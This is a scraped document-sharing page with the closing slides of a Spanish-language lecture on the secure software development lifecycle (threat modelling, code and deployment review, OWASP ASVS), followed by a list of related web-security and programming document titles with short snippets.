125 Modelado de amenazas (conclusiones) Es una actividad estructurada que permite identificar y evaluar amenazas y vulnerabilidades. Debe empezar temprano con el diseño arquitectónico del sistema Debe ser refinado en la etapa de implementación Debe coincidir plenamente con el diseño de los objetivos de seguridad Debe ayudar a ponderar contra otros aspectos de diseño como el rendimiento. 125

126 Otros abordajes de modelado de amenazas OWASP ( Trike ( OCTAVE (CERT) (SEI - Carnegie Mellon University ) ( 126

127 d) Diseño arquitectónico seguro (Etapa de desarrollo: Requerimiento y análisis) 127

128 Consideraciones de despliegue e infraestructura 128

129 Arquitectura de la aplicación y consideración de diseño 129

130 e) Revisión de Código seguro & Testing (Etapa de desarrollo: Desarrollo & Testing) 1: establecer metas y restricciones de la revisión 2: usar análisis estático para encontrar un conjunto inicial de vulnerabilidades 3: revisión de código buscando vulnerabilidades comunes guiados por el paso 2 4: revisar mecanismos únicos de seguridad en la arquitectura Técnicas de revisión: ControFlow DataFlow 130

131 Lista de preguntas para revisar el código 131

132 Lista de preguntas para revisar el código(2) 132

133 f) Revisión de Despliegue seguro (Etapa de desarrollo: Despliegue) Categorías de configuración de un servidor 133

134 Revisión de despliegue seguro Categorías de aseguramiento del servidor 134

135 Revisión de despliegue seguro Categorías de aseguramiento del servidor(2) 135

136 Application Security Verification Standard (OWASP) Permite verificar punto a punto cuestiones de seguridad en una aplicación web. Define 4 niveles de verificación: Cursory(0): la aplicación ha pasado cierto tipo de verificación Opportunistic(1): la aplicación posee defensas contra vulnerabilidades fáciles de descubrir Standard(2): posee defensas contra vulnerabilidades prevalentes con riesgo moderado a serio Advanced(3): posee defensas contra todas la vulnerabilidades y demuestra principios de buen diseño Define áreas de requerimiento de seguridad: Autenticación, Manejo de sesiones, Control de acceso, Manejo de entrada maliciosa, Criptografía, Manejo de errores y logging, Protección de datos, Comunicación, HTTP, Logica del negocio, Controles maliciosos, Archivos, y recursos, Moviles 136

137 Application Security Verification Standard (OWASP) Ejemplo de las verificaciones 137

138 Conclusiones El software para web tiene muchos elementos que deben ser considerados, no debe obviar ninguno. El software debe ser construido seguro desde el principio. Para ello debe apoyarse en alguna metodología. Aprender de los errores es importante y también lo es de otras experiencias. Estar al tanto con las vulnerabilidades es imperativo (especialmente de software de terceras partes que se utiliza). Utilizar herramientas automatizadas y/o semi-automatizadas para detectar y corregir errores es parte del trabajo de seguridad. 138

139 Obrigado pela atenção Perguntas? 139

Seguridad WEB Inyección de código

Seguridad WEB Inyección de código Seguridad WEB Inyección de código Maestría en TICs 2015 Énfasis Auditoría y Seguridad Informática Seguridad en aplicaciones y base de datos Cristian Cappo (ccappo@pol.una.py) NIDTEC - Núcleo de Investigación

Más detalles

SEGURIDAD WEB. Cristian Cappo (ccappo@pol.una.py)

SEGURIDAD WEB. Cristian Cappo (ccappo@pol.una.py) SEGURIDAD WEB Maestría en TICs 2015 Énfasis Auditoría y Seguridad Informática Seguridad en aplicaciones y base de datos Cristian Cappo (ccappo@pol.una.py) NIDTEC - Núcleo de Investigación y Desarrollo

Más detalles

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)

Más detalles

Programación páginas web. Servidor (PHP)

Programación páginas web. Servidor (PHP) Programación páginas web. Servidor (PHP) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos MySQL.

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL

Más detalles

PROGRAMACIÓN PÁGINAS WEB CON PHP

PROGRAMACIÓN PÁGINAS WEB CON PHP PROGRAMACIÓN PÁGINAS WEB CON PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología

Más detalles

abacformacio@abacformacio.com

abacformacio@abacformacio.com Programación de páginas web con PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología

Más detalles

Ciclo de vida de desarrollo de Software Seguro

Ciclo de vida de desarrollo de Software Seguro Ciclo de vida de desarrollo de Software Seguro Facultad Politécnica UNA Maestría en TICs 2015 Énfasis Auditoría y Seguridad de la Información Seguridad en aplicaciones y base de datos Cristian Cappo (ccappo@pol.una.py)

Más detalles

CONCLUSIONES 155 A través de cada uno de los capítulos del presente documento se han enumerado una serie herramientas de seguridad que forman parte del sistema de defensa de una red y que, controlan su

Más detalles

Resumen del trabajo sobre DNSSEC

Resumen del trabajo sobre DNSSEC Resumen del trabajo sobre Contenido 1. -...2 1.1. - Definición...2 1.2. - Seguridad basada en cifrado...2 1.3. - Cadenas de confianza...3 1.4. - Confianzas...4 1.5. - Islas de confianza...4 2. - Conclusiones...5

Más detalles

La utilización de las diferentes aplicaciones o servicios de Internet se lleva a cabo respondiendo al llamado modelo cliente-servidor.

La utilización de las diferentes aplicaciones o servicios de Internet se lleva a cabo respondiendo al llamado modelo cliente-servidor. Procesamiento del lado del servidor La Programación del lado del servidor es una tecnología que consiste en el procesamiento de una petición de un usuario mediante la interpretación de un script en el

Más detalles

Infraestructura Tecnológica. Sesión 10: Sistemas cortafuego

Infraestructura Tecnológica. Sesión 10: Sistemas cortafuego Infraestructura Tecnológica Sesión 10: Sistemas cortafuego Contextualización Actualmente tendemos a utilizar los sistemas de comunicación en una forma masiva, por lo que no siempre tenemos el cuidado adecuado

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS Las auditorias técnicas según el Reglamento 211/2011 de la Unión Europea y según el Reglamento de

Más detalles

Capítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN

Capítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CONCEPTOS DE PRUEBAS DE APLICACIÓN El departamento de Testing se encarga de diseñar, planear y aplicar el rol de pruebas a los sistemas que el PROVEEDOR

Más detalles

Capítulo 5. Cliente-Servidor.

Capítulo 5. Cliente-Servidor. Capítulo 5. Cliente-Servidor. 5.1 Introducción En este capítulo hablaremos acerca de la arquitectura Cliente-Servidor, ya que para nuestra aplicación utilizamos ésta arquitectura al convertir en un servidor

Más detalles

Directiva 005-2004-PCM/SG Directiva de seguridad ante la presencia de virus informático en la Presidencia del Consejo de Ministros

Directiva 005-2004-PCM/SG Directiva de seguridad ante la presencia de virus informático en la Presidencia del Consejo de Ministros Directiva 005-2004-PCM/SG Directiva de seguridad ante la presencia de virus informático en la Presidencia del Consejo de Ministros 2004 I HOJA DE INFORMACION GENERAL CONTROL DOCUMENTAL: PROCEDIMIENTO:

Más detalles

Workflows? Sí, cuántos quiere?

Workflows? Sí, cuántos quiere? Workflows? Sí, cuántos quiere? 12.11.2006 Servicios Profesionales Danysoft Son notables los beneficios que una organización puede obtener gracias al soporte de procesos de negocios que requieran la intervención

Más detalles

Q-expeditive Publicación vía Internet

Q-expeditive Publicación vía Internet How to Q-expeditive Publicación vía Internet Versión: 2.0 Fecha de publicación 11-04-2011 Aplica a: Q-expeditive 3 Índice Introducción... 3 Publicación de servicios... 3 Ciudadanos... 3 Terminales de auto

Más detalles

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.

Más detalles

Windows Server 2012: Infraestructura de Escritorio Virtual

Windows Server 2012: Infraestructura de Escritorio Virtual Windows Server 2012: Infraestructura de Escritorio Virtual Módulo 1: Application Virtualization Módulo del Manual Autores: James Hamilton-Adams, Content Master Publicado: 5 de Octubre 2012 La información

Más detalles

PDF created with pdffactory Pro trial version www.pdffactory.com

PDF created with pdffactory Pro trial version www.pdffactory.com Este libro está diseñado y escrito para aquellas personas que, conociendo HTML y JavaScript, desean dar un salto cuantioso en la creación de sitios web, con la programación dinámica en el lado del servidor.

Más detalles

Guía de doble autenticación

Guía de doble autenticación Guía de doble autenticación Índice Guía doble autenticación 1. Introducción a la Doble Autenticación: Qué es? 4 Ataques a las contraseñas 6 Fuerza bruta 6 Malware 6 Phishing 6 Ataques a servidores 6 2.

Más detalles

XPERTO EN DISEÑO DE PÁGINAS WEB

XPERTO EN DISEÑO DE PÁGINAS WEB Curso ICA de: EXPERTO EN DISEÑO DE PÁGINAS WEB Módulo 1: Program. cliente: JavaScript Estudia el lenguaje JavaScript para crear guiones o scripts que se incluyen en las páginas web y que son ejecutados

Más detalles

PROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP

PROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP PROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP OBJETIVOS Estudiar la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos

Más detalles

Servicios de Seguridad de la Información

Servicios de Seguridad de la Información Servicios de Seguridad de la Información Las siguientes actuaciones son medidas dirigidas a garantizar la Confidencialidad, Privacidad y Disponibilidad de los Servicios de la Información y que podemos

Más detalles

Requisitos de control de proveedores externos

Requisitos de control de proveedores externos Requisitos de control de proveedores externos Ciberseguridad Para proveedores clasificados como de bajo riesgo de ciberdelito 1. Protección de activos y configuración de sistemas Los Datos de Barclays,

Más detalles

UNIVERSIDAD DE OVIEDO

UNIVERSIDAD DE OVIEDO UNIVERSIDAD DE OVIEDO ESCUELA POLITÉCNICA DE INGENIERÍA DE GIJÓN MÁSTER EN INGENIERÍA INFORMÁTICA TRABAJO FIN DE MÁSTER SPRING ROO ADD-ONS PARA PROTOTIPADO RÁPIDO JAVIER MENÉNDEZ ÁLVAREZ JULIO 2014 UNIVERSIDAD

Más detalles

POLITICA DE PRIVACIDAD DE LA PAGINA WEB

POLITICA DE PRIVACIDAD DE LA PAGINA WEB POLITICA DE PRIVACIDAD DE LA PAGINA WEB operamos el website de Simple Solutions.com y respetamos la privacidad de los individuos que utilizan este website. A continuación detallamos cómo utilizamos la

Más detalles

Curso de PHP con MySQL Gratis

Curso de PHP con MySQL Gratis Curso de PHP con MySQL Gratis Introducción Este mini curso o mini tutorial de PHP le ayudará a realizar cualquier sistema para que pueda insertar uno o varios registros a una base de datos con MySQL, este

Más detalles

Elementos requeridos para crearlos (ejemplo: el compilador)

Elementos requeridos para crearlos (ejemplo: el compilador) Generalidades A lo largo del ciclo de vida del proceso de software, los productos de software evolucionan. Desde la concepción del producto y la captura de requisitos inicial hasta la puesta en producción

Más detalles

TECNOLOGIAS DE INFORMACION GUBERNAMENTAL OFICINA DE GERENCIA Y PRESUPUESTO

TECNOLOGIAS DE INFORMACION GUBERNAMENTAL OFICINA DE GERENCIA Y PRESUPUESTO TECNOLOGIAS DE INFORMACION GUBERNAMENTAL OFICINA DE GERENCIA Y PRESUPUESTO POLITICA NÚM. TIG-003 FECHA DE EFECTIVIDAD: 15 de diciembre de 2004 FECHA DE REVISIÓN: 12 de septiembre de 2007 TEMA: SEGURIDAD

Más detalles

Detectar y solucionar infecciones en un sitio web

Detectar y solucionar infecciones en un sitio web Detectar y solucionar infecciones en un sitio web Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Las infecciones que sufren los sitios web son uno de los principales

Más detalles

Tecnologías De La Información Y Comunicación I. Firewall Y Proxy. Integrantes: Héctor Duran. Katherine Zumelzu

Tecnologías De La Información Y Comunicación I. Firewall Y Proxy. Integrantes: Héctor Duran. Katherine Zumelzu Firewall Y Proxy Integrantes: Héctor Duran Katherine Zumelzu Fecha: 15/04/2015 Índice Qué es un firewall?... 3 Tipos de Firewall... 4 -Nivel de aplicación de Pasarela:... 4 -Circuito a nivel de Pasarela:...

Más detalles

CMS JOOMLA. Características

CMS JOOMLA. Características CMS JOOMLA Joomla es un sistema gestor de contenidos dinámicos (CMS o Content Management System) que permite crear sitios web de alta interactividad, profesionalidad y eficiencia. La administración de

Más detalles

Programación páginas web con ASP.NET 3.5 (C#)

Programación páginas web con ASP.NET 3.5 (C#) Horas de teoría: 40 Horas de práctica: 40 Programación páginas web con ASP.NET 3.5 (C#) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript

Más detalles

CONCEPTOS GENERALES SOBRE SEGURIDAD INFORMATICA

CONCEPTOS GENERALES SOBRE SEGURIDAD INFORMATICA CONCEPTOS GENERALES SOBRE SEGURIDAD INFORMATICA Hoy en día las redes de comunicaciones son cada vez mas importantes para las organizaciones ya que depende de estás, para que exista un manejo adecuado de

Más detalles

Anexo I. Politicas Generales de Seguridad del proyecto CAT

Anexo I. Politicas Generales de Seguridad del proyecto CAT Anexo I Politicas Generales de Seguridad del proyecto CAT 1 Del Puesto de Servicio. Se requiere mantener el Puesto de Servicio: a) Disponible, entendiendo por ello que el Puesto de Servicio debe estar

Más detalles

Desarrollo y servicios web

Desarrollo y servicios web Desarrollo y servicios web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Fin tutorial HTML 2. Nombres de dominio 3. URLs 3 Sesión 4. Método GET - POST Qué haremos hoy? 1. Tipos de solicitudes

Más detalles

Seguridad en Administración de Redes. INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos.

Seguridad en Administración de Redes. INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos. Seguridad en Administración de Redes INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos. Administración de Seguridad en Redes La administración

Más detalles

Contenido - 2. 2006 Derechos Reservados DIAN - Proyecto MUISCA

Contenido - 2. 2006 Derechos Reservados DIAN - Proyecto MUISCA Contenido 1. Introducción...3 2. Objetivos...4 3. El MUISCA Modelo Único de Ingresos, Servicio y Control Automatizado...4 4. Ingreso a los Servicios Informáticos Electrónicos...5 4.1. Inicio de Sesión

Más detalles

Modelamiento de Amenazas en el Desarrollo de Software

Modelamiento de Amenazas en el Desarrollo de Software Modelamiento de Amenazas en el Desarrollo de Software Davor A. Pavisic Jalasoft CTO Agenda La importancia Definición Beneficios Metodología Conclusiones 2 Porque Modelar Amenazas? La seguridad de aplicaciones

Más detalles

POLITICA DE PRIVACIDAD. www.tuboleta.com

POLITICA DE PRIVACIDAD. www.tuboleta.com http://vive.tuboleta.com/content/privatepolicy.aspx POLITICA DE PRIVACIDAD Tu Boleta respeta la privacidad de todos sus clientes y contactos comerciales, y está comprometido a salvaguardar la información

Más detalles

Infraestructura Tecnológica. Sesión 5: Arquitectura cliente-servidor

Infraestructura Tecnológica. Sesión 5: Arquitectura cliente-servidor Infraestructura Tecnológica Sesión 5: Arquitectura cliente-servidor Contextualización Dentro de los sistemas de comunicación que funcionan por medio de Internet podemos contemplar la arquitectura cliente-servidor.

Más detalles

Estado: Aprobación Versión: 2.0 Fecha: 04/11/2009 Página 1 de 9 Documento: A5_Politica_Seguridad_V2

Estado: Aprobación Versión: 2.0 Fecha: 04/11/2009 Página 1 de 9 Documento: A5_Politica_Seguridad_V2 Estado: Aprobación Versión: 2.0 Fecha: 04/11/2009 Página 1 de 9 INDICE 1. DECLARACIÓN DE LA POLÍTICA DE SEGURIDAD DE LA INFORMACIÓN... 3 2. POLÍTICA DE SEGURIDAD... 4 2.1. OBJETIVOS... 4 2.2. ALCANCE...

Más detalles

Haga clic para modificar el estilo de título del patrón Haga clic para modificar el estilo de texto del patrón

Haga clic para modificar el estilo de título del patrón Haga clic para modificar el estilo de texto del patrón texto del DESAFÍOS PARA ALCANZAR EL CUMPLIMIENTO: GUÍA DE IMPLEMENTACIÓN, INTEGRACIÓN DE LA SEGURIDAD EN EL CICLO DE VIDA DEL SOFTWARE, LABORATORIO PCI DSS COMPLIANT. FERMÍN GARDE FERNÁNDEZ RESPONSABLE

Más detalles

3-ANÁLISIS DE VULNERABILIDADES

3-ANÁLISIS DE VULNERABILIDADES 3-ANÁLISIS DE VULNERABILIDADES Es la tercera fase del ciclo de auditoria del tipo Hacking Ético, y tiene como objetivo el identificar si un sistema es débil o susceptible de ser afectado o atacado de alguna

Más detalles

Presentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL AVANZADO

Presentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL AVANZADO Presentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL AVANZADO Tabla de contenido Programación Web PHP con MySQL Avanzado...3 Presentación del curso...3 Objetivos de aprendizaje...4 Contenidos

Más detalles

Recomendaciones para operadores de Servicio de Correo Electrónico. Principios básicos para operadores de Correo Electrónico (ESPs)

Recomendaciones para operadores de Servicio de Correo Electrónico. Principios básicos para operadores de Correo Electrónico (ESPs) Recomendaciones para operadores de Servicio de Correo Electrónico Revisado: 12 Marzo 2007 Introducción Son conocidos los problemas que afectan a una aplicación tan ampliamente utilizado y crítica como

Más detalles

Introducción a la Firma Electrónica en MIDAS

Introducción a la Firma Electrónica en MIDAS Introducción a la Firma Electrónica en MIDAS Firma Digital Introducción. El Módulo para la Integración de Documentos y Acceso a los Sistemas(MIDAS) emplea la firma digital como método de aseguramiento

Más detalles

GUÍA DE SEGURIDAD DE LA INFORMACIÓN GUÍA GOBIERNO CORPORATIVO PARA EMPRESAS SEP

GUÍA DE SEGURIDAD DE LA INFORMACIÓN GUÍA GOBIERNO CORPORATIVO PARA EMPRESAS SEP GUÍA DE SEGURIDAD DE LA INFORMACIÓN GUÍA GOBIERNO CORPORATIVO PARA EMPRESAS SEP 1. Introducción La información puede adoptar o estar representada en diversas formas: impresa o escrita (papeles de trabajo,

Más detalles

INTRODUCCIÓN A LA PROGRAMACIÓN WEB UNIDAD. Estructura de contenidos: http://www.ucv.edu.pe/cis/ cisvirtual@ucv.edu.pe. 1.

INTRODUCCIÓN A LA PROGRAMACIÓN WEB UNIDAD. Estructura de contenidos: http://www.ucv.edu.pe/cis/ cisvirtual@ucv.edu.pe. 1. INTRODUCCIÓN A LA PROGRAMACIÓN WEB UNIDAD 1 Estructura de contenidos: 1. Programación Web 2. Sistema De Información 3. Sistema Web 4. Requisitos Para Sistemas Web Con Asp 5. Internet Information Server

Más detalles

Presentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL BÁSICO

Presentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL BÁSICO Presentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL BÁSICO INNOVATIVA CENTRO DE TRANSFERENCIA Y DESARROLLO TECNOLÓGICO ESPE CECAI Capacitación Virtual La mejor opción para su crecimiento profesional

Más detalles

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web

Más detalles

Resumen de Requisitos Técnicos para incorporación de Organismos a la Plataforma Integrada de Servicios Electrónicos del Estado

Resumen de Requisitos Técnicos para incorporación de Organismos a la Plataforma Integrada de Servicios Electrónicos del Estado Resumen de Requisitos Técnicos para incorporación de Organismos a la Plataforma Integrada de Servicios Electrónicos del Estado Ministerio Secretaría General de la Presidencia Unidad de Modernización y

Más detalles

MANUAL DE USUARIO. Webservice simple para la exportación rápida de información proveniente de una base de datos. Versión 0,1,1

MANUAL DE USUARIO. Webservice simple para la exportación rápida de información proveniente de una base de datos. Versión 0,1,1 MANUAL DE USUARIO Webservice simple para la exportación rápida de información proveniente de una base de datos Versión 0,1,1 Jorge Iván Meza Martínez INTRODUCCIÓN Esta aplicación permite

Más detalles

Banco de la República Bogotá D. C., Colombia

Banco de la República Bogotá D. C., Colombia Banco de la República Bogotá D. C., Colombia Subgerencia de Informática Departamento de Seguridad Informática MANUAL DE USUARIO PARA EL SERVICIO - SISTEMA DE GESTIÓN PKI DE USUARIOS ROAMING - USI-GI-56

Más detalles

Infraestructura Tecnológica. Sesión 1: Infraestructura de servidores

Infraestructura Tecnológica. Sesión 1: Infraestructura de servidores Infraestructura Tecnológica Sesión 1: Infraestructura de servidores Contextualización La infraestructura de cualquier servicio o mecanismo es importante, define el funcionamiento de los elementos en que

Más detalles

ISO 27001- Anexo A OBJETIVOS DE CONTROL Y CONTROLES DE REFERENCIA DANIELA RAMIREZ PEÑARANDA 1150453 WENDY CARRASCAL VILLAMIZAR 1150458

ISO 27001- Anexo A OBJETIVOS DE CONTROL Y CONTROLES DE REFERENCIA DANIELA RAMIREZ PEÑARANDA 1150453 WENDY CARRASCAL VILLAMIZAR 1150458 ISO 27001- Anexo A OBJETIVOS DE CONTROL Y CONTROLES DE REFERENCIA DANIELA RAMIREZ PEÑARANDA 1150453 WENDY CARRASCAL VILLAMIZAR 1150458 UNIVERSIDAD FRANCISCO DE PAULA SANTANDER INGENIERIA DE SISTEMAS SEGURIDAD

Más detalles

Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA

Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA Documento de trabajo elaborado para la Red Temática DocenWeb: Red Temática de Docencia en Control mediante Web (DPI2002-11505-E)

Más detalles

Curso de Programación PHP

Curso de Programación PHP Curso de Programación PHP Presentación : PHP es el lenguaje de programación más usado en los servidores de Internet debido a su potencia, velocidad de ejecución y simplicidad que lo caracterizan. Este

Más detalles

Política de la base datos WHOIS para nombres de dominio.eu

Política de la base datos WHOIS para nombres de dominio.eu Política de la base datos WHOIS para nombres de dominio.eu 1/7 DEFINICIONES En este documento se usan los mismos términos definidos en los Términos y Condiciones y/o las normas para la solución de controversias

Más detalles

Copyright. INSTRUCTIVO DE CONFIGURACIÓN DE PC s DE CLIENTES CASH MANAGEMENT

Copyright. INSTRUCTIVO DE CONFIGURACIÓN DE PC s DE CLIENTES CASH MANAGEMENT Copyright Este es un documento con DERECHOS DE AUTOR RESERVADOS. PROHIBIDA SU REPRODUCCIÓN O UTLIZACIÓN TOTAL O PARCIAL, sin autorización escrita del Gerente General de Banco General Rumiñahui S.A. NOTA

Más detalles

Introducción a las Redes de Computadoras. Obligatorio 2 2011

Introducción a las Redes de Computadoras. Obligatorio 2 2011 Introducción a las Redes de Computadoras Obligatorio 2 2011 Facultad de Ingeniería Instituto de Computación Departamento de Arquitectura de Sistemas Nota previa - IMPORTANTE Se debe cumplir íntegramente

Más detalles

INTRODUCCION. Tema: Protocolo de la Capa de aplicación. FTP HTTP. Autor: Julio Cesar Morejon Rios

INTRODUCCION. Tema: Protocolo de la Capa de aplicación. FTP HTTP. Autor: Julio Cesar Morejon Rios INTRODUCCION Tema: Protocolo de la Capa de aplicación. FTP HTTP Autor: Julio Cesar Morejon Rios Qué es FTP? FTP (File Transfer Protocol) es un protocolo de transferencia de archivos entre sistemas conectados

Más detalles

PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN

PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN Los protocolos de capa de aplicación de TCP/IP más conocidos son aquellos que proporcionan intercambio de la información

Más detalles

CONDICIONES TÉCNICAS PARA SERVICIO ILUMINACIÓN ZONAS WIFI PARA CLIENTES CORPORATIVOS. Vicepresidencia de Infraestructura

CONDICIONES TÉCNICAS PARA SERVICIO ILUMINACIÓN ZONAS WIFI PARA CLIENTES CORPORATIVOS. Vicepresidencia de Infraestructura CONDICIONES TÉCNICAS PARA SERVICIO ILUMINACIÓN ZONAS WIFI PARA CLIENTES CORPORATIVOS Vicepresidencia de Infraestructura Gerencia Planeación Infraestructura y Servicios TABLA DE CONTENIDO 1. OBJETIVO...

Más detalles

LABORATORIO DE RC: PRÁCTICA 4: IMPLEMENTACIÓN DE UN CLIENTE DE CORREO

LABORATORIO DE RC: PRÁCTICA 4: IMPLEMENTACIÓN DE UN CLIENTE DE CORREO UNIVERSIDADE DA CORUÑA Departamento de Tecnoloxías da Información e as Comunicacións LABORATORIO DE RC: PRÁCTICA 4: IMPLEMENTACIÓN DE UN CLIENTE DE CORREO PRÁCTICA 4: Implementación de un Cliente de Correo

Más detalles

CORPORACIÓN MEXICANA DE INVESTIGACIÓN EN MATERIALES, S.A. DE CV

CORPORACIÓN MEXICANA DE INVESTIGACIÓN EN MATERIALES, S.A. DE CV Página 1 de 6 1. OBJETIVO El presente documento tiene la finalidad de citar los beneficios de la migración de la herramienta de análisis de riesgo, mantenimiento e inspección que en lo sucesivo se denominará

Más detalles

Firewalls, IPtables y Netfilter

Firewalls, IPtables y Netfilter Firewalls, IPtables y Netfilter Dastugue, Juan Cristobal, Leandro Temario Políticas de diseño de un Firewall Definición Qué es un Firewall? Es un sistema o conjunto de sistemas, ubicado entre dos redes.

Más detalles

INFORME DE RESULTADOS DE LA 1 ENCUESTA DE SEGURIDAD DE LA INFORMACIÓN EN UNIVERSIDADES ECUATORIANAS MIEMBROS DE CEDIA

INFORME DE RESULTADOS DE LA 1 ENCUESTA DE SEGURIDAD DE LA INFORMACIÓN EN UNIVERSIDADES ECUATORIANAS MIEMBROS DE CEDIA INFORME DE RESULTADOS DE LA 1 ENCUESTA DE SEGURIDAD DE LA INFORMACIÓN EN UNIVERSIDADES ECUATORIANAS MIEMBROS DE CEDIA INFORME DE RESULTADOS DE LA 1 ENCUESTA DE SEGURIDAD DE LA INFORMACIÓN EN UNIVERSIDADES

Más detalles

LABORATORIO 10. COPIAS DE SEGURIDAD, RESTAURACIÓN Y RECUPERACIÓN DE UNA BD

LABORATORIO 10. COPIAS DE SEGURIDAD, RESTAURACIÓN Y RECUPERACIÓN DE UNA BD LABORATORIO 10. COPIAS DE SEGURIDAD, RESTAURACIÓN Y RECUPERACIÓN DE UNA BD GUÍA DE LABORATORIO Nº 1O Actividad de Proyecto No. 12: ESTABLECER PLANES DE RESGUARDO, RESTAURACION Y CONTINGENCIA. Copias de

Más detalles

Guia rápida EPlus Cliente-Servidor

Guia rápida EPlus Cliente-Servidor Guia rápida EPlus Cliente-Servidor Esta guía permitirá al usuario instalar la aplicación e-plus, para firmar y declarar sus trámites a través de acceso remoto. CONSIDERACIONES GENERALES.- El software eplus

Más detalles

El USUARIO manifiesta que es jurídicamente capaz de realizar el procedimiento a utilizar y que está facultado para hacer uso del mismo.

El USUARIO manifiesta que es jurídicamente capaz de realizar el procedimiento a utilizar y que está facultado para hacer uso del mismo. A continuación se detallan los términos y condiciones bajo las cuales se regirá el servicio de pagos en línea del Municipio de Itagüí, para ello se proveerá la plataforma tecnológica con el fin de prestar

Más detalles

GATEWAYS COMO FIREWALLS

GATEWAYS COMO FIREWALLS GATEWAYS COMO FIREWALLS Ricardo Sánchez Q. Estudiante Ingeniería Telemática Aunque las empresas que han experimentado un ataque a su red por mano de usuarios no deseados, son recientes a hablar sobre sus

Más detalles

DIPLOMADO EN SEGURIDAD INFORMATICA

DIPLOMADO EN SEGURIDAD INFORMATICA DIPLOMADO EN SEGURIDAD INFORMATICA Modulo 9: Soporte Computacional Clase 9_3:Protocolos de comunicación y conectividad de arquitecturas multiplataforma. Director Programa: César Torres A Profesor : Claudio

Más detalles

